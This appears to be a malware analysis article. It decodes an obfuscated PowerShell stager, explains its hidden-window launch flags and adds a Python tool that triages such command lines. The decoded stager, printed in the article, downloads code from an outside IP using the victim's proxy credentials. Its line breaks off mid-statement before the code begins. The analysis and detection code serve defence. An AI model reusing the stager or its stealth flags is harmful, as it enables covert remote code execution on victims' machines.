Dissecting a Malicious PowerShell Script: A Detailed Analysis

Introduction

You’ve stumbled upon a puzzling Base64-encoded PowerShell script that appears to have malicious intent. As a cybersecurity professional, your mission is to dive deep into this script, uncover its true nature, and reveal the potential risks it poses to our digital realm. Get ready to embark on a daring quest to safeguard our systems!

Decoding the Script

The first step is to decode the Base64-encoded script. By using the CyberChef tool, we can quickly reveal the underlying PowerShell code. The script starts with a series of command-line arguments that are designed to make the PowerShell window hidden and non-interactive when executed.

powershell.exe -NoP -sta -NonI -W Hidden -Enc

These arguments include:

  • -NoP: Suppresses the loading of the Windows PowerShell profile.
  • -sta: Starts PowerShell in a single-threaded apartment.
  • -NonI: Runs PowerShell in non-interactive mode, preventing any prompts.
  • -W Hidden: Sets the window style to hidden, making the PowerShell window invisible.
  • -Enc: Accepts a Base64-encoded string as the command to be executed.

After decoding the Base64 string, we can see the actual PowerShell code that the script is running:

$WC=New-ObjEcT SySTeM.NET.WebCliENt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$WC.HeADeRS.ADd('User-Agent',$u);$Wc.ProxY = [System.NeT.WEBReQUEst]::DEFAuLtWebProXy;$wc.PROxY.CrEdenTialS = [SysTem.NEt.CRedeNTIAlCAcHE]::DeFAULTNetWOrKCredENTiAls;$K='IM-S&fA9Xu{[)|wdWJhC+!N~vq_12Lty';$i=0;[CHaR[]]$B=([cHaR[]]($wc.DOwNLOaDStriNg("http://98.103.103.170:7443/index.asp
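The decoding and argument-review steps above can be scripted so that a captured command line is triaged consistently rather than pasted into CyberChef each time. The following Python is an added example and not code from the article; it assumes a short parameter table (a subset of what powershell.exe accepts), uses shlex as a simplification of Windows command-line splitting, and builds its sample command line from a fragment of the decoded script quoted above, re-encoded the way -EncodedCommand expects it (Base64 over UTF-16LE). The scramble score is a heuristic the example introduces to flag the random casing seen in the decoded code (New-ObjEcT, SySTeM.NET.WebCliENt); it is not something the article describes.

```python
import base64
import re
import shlex

# Canonical powershell.exe parameter names (subset, lowercase key -> display form).
# powershell.exe accepts any unambiguous prefix, which is why -NoP, -NonI, -W
# and -Enc all work; an analyst should normalise them before matching rules.
KNOWN_PARAMS = {
    "noprofile": "-NoProfile",
    "sta": "-STA",
    "mta": "-MTA",
    "noninteractive": "-NonInteractive",
    "windowstyle": "-WindowStyle",
    "encodedcommand": "-EncodedCommand",
    "executionpolicy": "-ExecutionPolicy",
    "command": "-Command",
    "file": "-File",
    "nologo": "-NoLogo",
    "noexit": "-NoExit",
    "version": "-Version",
}
# Short forms that are documented aliases rather than plain prefixes.
ALIASES = {"e": "encodedcommand", "ec": "encodedcommand",
           "ex": "executionpolicy", "ep": "executionpolicy",
           "c": "command", "f": "file"}
# Parameters that consume the following token as their value.
TAKES_VALUE = {"-WindowStyle", "-EncodedCommand", "-ExecutionPolicy",
               "-Command", "-File", "-Version"}


def canonical_param(token):
    """Map a switch such as -NonI to its full name; None if not a known switch."""
    if not token.startswith("-"):
        return None
    name = token.lstrip("-").lower()
    if name in ALIASES:
        return KNOWN_PARAMS[ALIASES[name]]
    matches = [full for full in KNOWN_PARAMS if full.startswith(name)]
    return KNOWN_PARAMS[matches[0]] if len(matches) == 1 else None


def parse_command_line(cmdline):
    """Return {canonical switch: value-or-True}; unknown tokens land in '_unparsed'."""
    tokens = shlex.split(cmdline)  # simplification of Windows argument rules
    params = {}
    i = 1  # tokens[0] is the executable
    while i < len(tokens):
        canon = canonical_param(tokens[i])
        if canon is None:
            params.setdefault("_unparsed", []).append(tokens[i])
            i += 1
        elif canon in TAKES_VALUE and i + 1 < len(tokens):
            params[canon] = tokens[i + 1]
            i += 2
        else:
            params[canon] = True
            i += 1
    return params


def encode_command(script):
    """Produce the -EncodedCommand form of a script (Base64 over UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64):
    """Reverse encode_command; None if the data is not valid Base64/UTF-16LE."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None


def scramble_score(script):
    """Fraction of alphabetic runs (len >= 4) with two or more lower->upper
    case flips, e.g. ObjEcT or HeADeRS. Ordinary PascalCase scores 0."""
    runs = [s for s in re.findall(r"[A-Za-z]+", script) if len(s) >= 4]
    if not runs:
        return 0.0
    flips = lambda s: sum(1 for a, b in zip(s, s[1:]) if a.islower() and b.isupper())
    return sum(1 for s in runs if flips(s) >= 2) / len(runs)


def triage(cmdline):
    """Normalise switches, decode the payload and list the suspicious traits."""
    params = parse_command_line(cmdline)
    findings = []
    if str(params.get("-WindowStyle", "")).lower() == "hidden":
        findings.append("hidden window")
    if "-NonInteractive" in params:
        findings.append("non-interactive")
    if "-NoProfile" in params:
        findings.append("profile suppressed")
    decoded = None
    if "-EncodedCommand" in params:
        decoded = decode_encoded_command(params["-EncodedCommand"])
        findings.append("encoded command" if decoded else "encoded command (undecodable)")
        if decoded and scramble_score(decoded) >= 0.5:
            findings.append("case-scrambled tokens")
    return {"params": params, "decoded": decoded, "findings": findings}


# Constructed sample: a fragment of the decoded script from the article,
# re-encoded so the command line looks like the one under analysis.
SAMPLE_SCRIPT = ("$WC=New-ObjEcT SySTeM.NET.WebCliENt;$u='Mozilla/5.0';"
                 "$WC.HeADeRS.ADd('User-Agent',$u)")
SAMPLE_CMDLINE = ("powershell.exe -NoP -sta -NonI -W Hidden -Enc "
                  + encode_command(SAMPLE_SCRIPT))

if __name__ == "__main__":
    result = triage(SAMPLE_CMDLINE)
    print(result["findings"])
    print(result["decoded"])
```

Running the block prints the normalised findings for the sample line, then the decoded script. The scramble score is meant as a cheap triage signal, not a verdict: a decoded command can be entirely lowercase and still be hostile, so the decoded text itself is what the rest of the analysis works on.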